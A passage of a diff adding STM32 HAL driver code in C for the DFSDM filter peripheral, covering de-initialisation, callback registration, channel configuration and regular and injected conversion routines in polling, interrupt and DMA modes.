if(hdfsdm_filter == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Disable the DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_DFEN); + + /* Call MSP deinit function */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + if(hdfsdm_filter->MspDeInitCallback == NULL) + { + hdfsdm_filter->MspDeInitCallback = HAL_DFSDM_FilterMspDeInit; + } + hdfsdm_filter->MspDeInitCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterMspDeInit(hdfsdm_filter); +#endif + + /* Set DFSDM filter in reset state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_RESET; + + return HAL_OK; +} + +/** + * @brief Initializes the DFSDM filter MSP. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterMspInit(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the function is needed, + the HAL_DFSDM_FilterMspInit could be implemented in the user file. + */ +} + +/** + * @brief De-initializes the DFSDM filter MSP. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterMspDeInit(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the function is needed, + the HAL_DFSDM_FilterMspDeInit could be implemented in the user file. + */ +} + +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a user DFSDM filter callback + * to be used instead of the weak predefined callback. + * @param hdfsdm_filter DFSDM filter handle. + * @param CallbackID ID of the callback to be registered. + * This parameter can be one of the following values: + * @arg @ref HAL_DFSDM_FILTER_REGCONV_COMPLETE_CB_ID regular conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_REGCONV_HALFCOMPLETE_CB_ID half regular conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_INJCONV_COMPLETE_CB_ID injected conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_INJCONV_HALFCOMPLETE_CB_ID half injected conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_ERROR_CB_ID error callback ID. + * @arg @ref HAL_DFSDM_FILTER_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_DFSDM_FILTER_MSPDEINIT_CB_ID MSP de-init callback ID. + * @param pCallback pointer to the callback function. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Filter_RegisterCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + HAL_DFSDM_Filter_CallbackIDTypeDef CallbackID, + pDFSDM_Filter_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + else + { + if(HAL_DFSDM_FILTER_STATE_READY == hdfsdm_filter->State) + { + switch (CallbackID) + { + case HAL_DFSDM_FILTER_REGCONV_COMPLETE_CB_ID : + hdfsdm_filter->RegConvCpltCallback = pCallback; + break; + case HAL_DFSDM_FILTER_REGCONV_HALFCOMPLETE_CB_ID : + hdfsdm_filter->RegConvHalfCpltCallback = pCallback; + break; + case HAL_DFSDM_FILTER_INJCONV_COMPLETE_CB_ID : + hdfsdm_filter->InjConvCpltCallback = pCallback; + break; + case HAL_DFSDM_FILTER_INJCONV_HALFCOMPLETE_CB_ID : + hdfsdm_filter->InjConvHalfCpltCallback = pCallback; + break; + case HAL_DFSDM_FILTER_ERROR_CB_ID : + hdfsdm_filter->ErrorCallback = pCallback; + break; + case HAL_DFSDM_FILTER_MSPINIT_CB_ID : + hdfsdm_filter->MspInitCallback = pCallback; + break; + case HAL_DFSDM_FILTER_MSPDEINIT_CB_ID : + hdfsdm_filter->MspDeInitCallback = pCallback; + break; + default : + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_DFSDM_FILTER_STATE_RESET == hdfsdm_filter->State) + { + switch (CallbackID) + { + case HAL_DFSDM_FILTER_MSPINIT_CB_ID : + hdfsdm_filter->MspInitCallback = pCallback; + break; + case HAL_DFSDM_FILTER_MSPDEINIT_CB_ID : + hdfsdm_filter->MspDeInitCallback = pCallback; + break; + default : + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + } + return status; +} + +/** + * @brief Unregister a user DFSDM filter callback. + * DFSDM filter callback is redirected to the weak predefined callback. + * @param hdfsdm_filter DFSDM filter handle. + * @param CallbackID ID of the callback to be unregistered. + * This parameter can be one of the following values: + * @arg @ref HAL_DFSDM_FILTER_REGCONV_COMPLETE_CB_ID regular conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_REGCONV_HALFCOMPLETE_CB_ID half regular conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_INJCONV_COMPLETE_CB_ID injected conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_INJCONV_HALFCOMPLETE_CB_ID half injected conversion complete callback ID. + * @arg @ref HAL_DFSDM_FILTER_ERROR_CB_ID error callback ID. + * @arg @ref HAL_DFSDM_FILTER_MSPINIT_CB_ID MSP init callback ID. + * @arg @ref HAL_DFSDM_FILTER_MSPDEINIT_CB_ID MSP de-init callback ID. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Filter_UnRegisterCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + HAL_DFSDM_Filter_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(HAL_DFSDM_FILTER_STATE_READY == hdfsdm_filter->State) + { + switch (CallbackID) + { + case HAL_DFSDM_FILTER_REGCONV_COMPLETE_CB_ID : + hdfsdm_filter->RegConvCpltCallback = HAL_DFSDM_FilterRegConvCpltCallback; + break; + case HAL_DFSDM_FILTER_REGCONV_HALFCOMPLETE_CB_ID : + hdfsdm_filter->RegConvHalfCpltCallback = HAL_DFSDM_FilterRegConvHalfCpltCallback; + break; + case HAL_DFSDM_FILTER_INJCONV_COMPLETE_CB_ID : + hdfsdm_filter->InjConvCpltCallback = HAL_DFSDM_FilterInjConvCpltCallback; + break; + case HAL_DFSDM_FILTER_INJCONV_HALFCOMPLETE_CB_ID : + hdfsdm_filter->InjConvHalfCpltCallback = HAL_DFSDM_FilterInjConvHalfCpltCallback; + break; + case HAL_DFSDM_FILTER_ERROR_CB_ID : + hdfsdm_filter->ErrorCallback = HAL_DFSDM_FilterErrorCallback; + break; + case HAL_DFSDM_FILTER_MSPINIT_CB_ID : + hdfsdm_filter->MspInitCallback = HAL_DFSDM_FilterMspInit; + break; + case HAL_DFSDM_FILTER_MSPDEINIT_CB_ID : + hdfsdm_filter->MspDeInitCallback = HAL_DFSDM_FilterMspDeInit; + break; + default : + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(HAL_DFSDM_FILTER_STATE_RESET == hdfsdm_filter->State) + { + switch (CallbackID) + { + case HAL_DFSDM_FILTER_MSPINIT_CB_ID : + hdfsdm_filter->MspInitCallback = HAL_DFSDM_FilterMspInit; + break; + case HAL_DFSDM_FILTER_MSPDEINIT_CB_ID : + hdfsdm_filter->MspDeInitCallback = HAL_DFSDM_FilterMspDeInit; + break; + default : + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + return status; +} + +/** + * @brief Register a user DFSDM filter analog watchdog callback + * to be used instead of the weak predefined callback. + * @param hdfsdm_filter DFSDM filter handle. + * @param pCallback pointer to the DFSDM filter analog watchdog callback function. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Filter_RegisterAwdCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + pDFSDM_Filter_AwdCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + else + { + if(HAL_DFSDM_FILTER_STATE_READY == hdfsdm_filter->State) + { + hdfsdm_filter->AwdCallback = pCallback; + } + else + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + } + return status; +} + +/** + * @brief Unregister a user DFSDM filter analog watchdog callback. + * DFSDM filter AWD callback is redirected to the weak predefined callback. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_Filter_UnRegisterAwdCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(HAL_DFSDM_FILTER_STATE_READY == hdfsdm_filter->State) + { + hdfsdm_filter->AwdCallback = HAL_DFSDM_FilterAwdCallback; + } + else + { + /* update the error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + return status; +} +#endif /* USE_HAL_DFSDM_REGISTER_CALLBACKS */ +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group2_Filter Filter control functions + * @brief Filter control functions + * +@verbatim + ============================================================================== + ##### Filter control functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Select channel and enable/disable continuous mode for regular conversion. + (+) Select channels for injected conversion. +@endverbatim + * @{ + */ + +/** + * @brief This function allows to select channel and to enable/disable + * continuous mode for regular conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Channel for regular conversion. + * This parameter can be a value of @ref DFSDM_Channel_Selection. + * @param ContinuousMode Enable/disable continuous mode for regular conversion. + * This parameter can be a value of @ref DFSDM_ContinuousMode. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterConfigRegChannel(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Channel, + uint32_t ContinuousMode) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(IS_DFSDM_REGULAR_CHANNEL(Channel)); + assert_param(IS_DFSDM_CONTINUOUS_MODE(ContinuousMode)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_RESET) && + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Configure channel and continuous mode for regular conversion */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_RCH | DFSDM_FLTCR1_RCONT); + if(ContinuousMode == DFSDM_CONTINUOUS_CONV_ON) + { + hdfsdm_filter->Instance->FLTCR1 |= (uint32_t) (((Channel & DFSDM_MSB_MASK) << DFSDM_FLTCR1_MSB_RCH_OFFSET) | + DFSDM_FLTCR1_RCONT); + } + else + { + hdfsdm_filter->Instance->FLTCR1 |= (uint32_t) ((Channel & DFSDM_MSB_MASK) << DFSDM_FLTCR1_MSB_RCH_OFFSET); + } + /* Store continuous mode information */ + hdfsdm_filter->RegularContMode = ContinuousMode; + } + else + { + status = HAL_ERROR; + } + + /* Return function status */ + return status; +} + +/** + * @brief This function allows to select channels for injected conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Channels for injected conversion. + * This parameter can be a values combination of @ref DFSDM_Channel_Selection. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterConfigInjChannel(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(IS_DFSDM_INJECTED_CHANNEL(Channel)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_RESET) && + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Configure channel for injected conversion */ + hdfsdm_filter->Instance->FLTJCHGR = (uint32_t) (Channel & DFSDM_LSB_MASK); + /* Store number of injected channels */ + hdfsdm_filter->InjectedChannelsNbr = DFSDM_GetInjChannelsNbr(Channel); + /* Update number of injected channels remaining */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group3_Filter Filter operation functions + * @brief Filter operation functions + * +@verbatim + ============================================================================== + ##### Filter operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Start conversion of regular/injected channel. + (+) Poll for the end of regular/injected conversion. + (+) Stop conversion of regular/injected channel. + (+) Start conversion of regular/injected channel and enable interrupt. + (+) Call the callback functions at the end of regular/injected conversions. + (+) Stop conversion of regular/injected channel and disable interrupt. + (+) Start conversion of regular/injected channel and enable DMA transfer. + (+) Stop conversion of regular/injected channel and disable DMA transfer. + (+) Start analog watchdog and enable interrupt. + (+) Call the callback function when analog watchdog occurs. + (+) Stop analog watchdog and disable interrupt. + (+) Start extreme detector. + (+) Stop extreme detector. + (+) Get result of regular channel conversion. + (+) Get result of injected channel conversion. + (+) Get extreme detector maximum and minimum values. + (+) Get conversion time. + (+) Handle DFSDM interrupt request. +@endverbatim + * @{ + */ + +/** + * @brief This function allows to start regular conversion in polling mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStart(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ)) + { + /* Start regular conversion */ + DFSDM_RegConvStart(hdfsdm_filter); + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to poll for the end of regular conversion. + * @note This function should be called only if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @param Timeout Timeout value in milliseconds. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterPollForRegConversion(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Timeout) +{ + uint32_t tickstart; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + return HAL_ERROR; + } + else + { + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait end of regular conversion */ + while((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_REOCF) != DFSDM_FLTISR_REOCF) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if(((HAL_GetTick()-tickstart) > Timeout) || (Timeout == 0U)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + /* Check if overrun occurs */ + if((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_ROVRF) == DFSDM_FLTISR_ROVRF) + { + /* Update error code and call error callback */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_REGULAR_OVERRUN; +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->ErrorCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterErrorCallback(hdfsdm_filter); +#endif + + /* Clear regular overrun flag */ + hdfsdm_filter->Instance->FLTICR = DFSDM_FLTICR_CLRROVRF; + } + /* Update DFSDM filter state only if not continuous conversion and SW trigger */ + if((hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER)) + { + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_INJ; + } + /* Return function status */ + return HAL_OK; + } +} + +/** + * @brief This function allows to stop regular conversion in polling mode. + * @note This function should be called only if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStop(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop regular conversion */ + DFSDM_RegConvStop(hdfsdm_filter); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start regular conversion in interrupt mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStart_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ)) + { + /* Enable interrupts for regular conversions */ + hdfsdm_filter->Instance->FLTCR2 |= (DFSDM_FLTCR2_REOCIE | DFSDM_FLTCR2_ROVRIE); + + /* Start regular conversion */ + DFSDM_RegConvStart(hdfsdm_filter); + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop regular conversion in interrupt mode. + * @note This function should be called only if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStop_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Disable interrupts for regular conversions */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_REOCIE | DFSDM_FLTCR2_ROVRIE); + + /* Stop regular conversion */ + DFSDM_RegConvStop(hdfsdm_filter); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start regular conversion in DMA mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if injected conversion is ongoing. + * Please note that data on buffer will contain signed regular conversion + * value on 24 most significant bits and corresponding channel on 3 least + * significant bits. + * @param hdfsdm_filter DFSDM filter handle. + * @param pData The destination buffer address. + * @param Length The length of data to be transferred from DFSDM filter to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStart_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + int32_t *pData, + uint32_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check destination address and length */ + if((pData == NULL) || (Length == 0U)) + { + status = HAL_ERROR; + } + /* Check that DMA is enabled for regular conversion */ + else if((hdfsdm_filter->Instance->FLTCR1 & DFSDM_FLTCR1_RDMAEN) != DFSDM_FLTCR1_RDMAEN) + { + status = HAL_ERROR; + } + /* Check parameters compatibility */ + else if((hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->hdmaReg->Init.Mode == DMA_NORMAL) && \ + (Length != 1U)) + { + status = HAL_ERROR; + } + else if((hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->hdmaReg->Init.Mode == DMA_CIRCULAR)) + { + status = HAL_ERROR; + } + /* Check DFSDM filter state */ + else if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ)) + { + /* Set callbacks on DMA handler */ + hdfsdm_filter->hdmaReg->XferCpltCallback = DFSDM_DMARegularConvCplt; + hdfsdm_filter->hdmaReg->XferErrorCallback = DFSDM_DMAError; + hdfsdm_filter->hdmaReg->XferHalfCpltCallback = (hdfsdm_filter->hdmaReg->Init.Mode == DMA_CIRCULAR) ?\ + DFSDM_DMARegularHalfConvCplt : NULL; + + /* Start DMA in interrupt mode */ + if(HAL_DMA_Start_IT(hdfsdm_filter->hdmaReg, (uint32_t)&hdfsdm_filter->Instance->FLTRDATAR, \ + (uint32_t) pData, Length) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Start regular conversion */ + DFSDM_RegConvStart(hdfsdm_filter); + } + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start regular conversion in DMA mode and to get + * only the 16 most significant bits of conversion. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if injected conversion is ongoing. + * Please note that data on buffer will contain signed 16 most significant + * bits of regular conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @param pData The destination buffer address. + * @param Length The length of data to be transferred from DFSDM filter to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularMsbStart_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + int16_t *pData, + uint32_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check destination address and length */ + if((pData == NULL) || (Length == 0U)) + { + status = HAL_ERROR; + } + /* Check that DMA is enabled for regular conversion */ + else if((hdfsdm_filter->Instance->FLTCR1 & DFSDM_FLTCR1_RDMAEN) != DFSDM_FLTCR1_RDMAEN) + { + status = HAL_ERROR; + } + /* Check parameters compatibility */ + else if((hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->hdmaReg->Init.Mode == DMA_NORMAL) && \ + (Length != 1U)) + { + status = HAL_ERROR; + } + else if((hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->hdmaReg->Init.Mode == DMA_CIRCULAR)) + { + status = HAL_ERROR; + } + /* Check DFSDM filter state */ + else if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ)) + { + /* Set callbacks on DMA handler */ + hdfsdm_filter->hdmaReg->XferCpltCallback = DFSDM_DMARegularConvCplt; + hdfsdm_filter->hdmaReg->XferErrorCallback = DFSDM_DMAError; + hdfsdm_filter->hdmaReg->XferHalfCpltCallback = (hdfsdm_filter->hdmaReg->Init.Mode == DMA_CIRCULAR) ?\ + DFSDM_DMARegularHalfConvCplt : NULL; + + /* Start DMA in interrupt mode */ + if(HAL_DMA_Start_IT(hdfsdm_filter->hdmaReg, (uint32_t)(&hdfsdm_filter->Instance->FLTRDATAR) + 2U, \ + (uint32_t) pData, Length) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Start regular conversion */ + DFSDM_RegConvStart(hdfsdm_filter); + } + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop regular conversion in DMA mode. + * @note This function should be called only if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterRegularStop_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop current DMA transfer */ + if(HAL_DMA_Abort(hdfsdm_filter->hdmaReg) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Stop regular conversion */ + DFSDM_RegConvStop(hdfsdm_filter); + } + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to get regular conversion value. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Corresponding channel of regular conversion. + * @retval Regular conversion value + */ +int32_t HAL_DFSDM_FilterGetRegularValue(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t *Channel) +{ + uint32_t reg = 0U; + int32_t value = 0; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(Channel != NULL); + + /* Get value of data register for regular channel */ + reg = hdfsdm_filter->Instance->FLTRDATAR; + + /* Extract channel and regular conversion value */ + *Channel = (reg & DFSDM_FLTRDATAR_RDATACH); + value = ((int32_t)(reg & DFSDM_FLTRDATAR_RDATA) >> DFSDM_FLTRDATAR_RDATA_Pos); + + /* return regular conversion value */ + return value; +} + +/** + * @brief This function allows to start injected conversion in polling mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStart(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG)) + { + /* Start injected conversion */ + DFSDM_InjConvStart(hdfsdm_filter); + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to poll for the end of injected conversion. + * @note This function should be called only if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @param Timeout Timeout value in milliseconds. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterPollForInjConversion(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Timeout) +{ + uint32_t tickstart; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_INJ) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + return HAL_ERROR; + } + else + { + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait end of injected conversions */ + while((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_JEOCF) != DFSDM_FLTISR_JEOCF) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if( ((HAL_GetTick()-tickstart) > Timeout) || (Timeout == 0U)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + /* Check if overrun occurs */ + if((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_JOVRF) == DFSDM_FLTISR_JOVRF) + { + /* Update error code and call error callback */ + 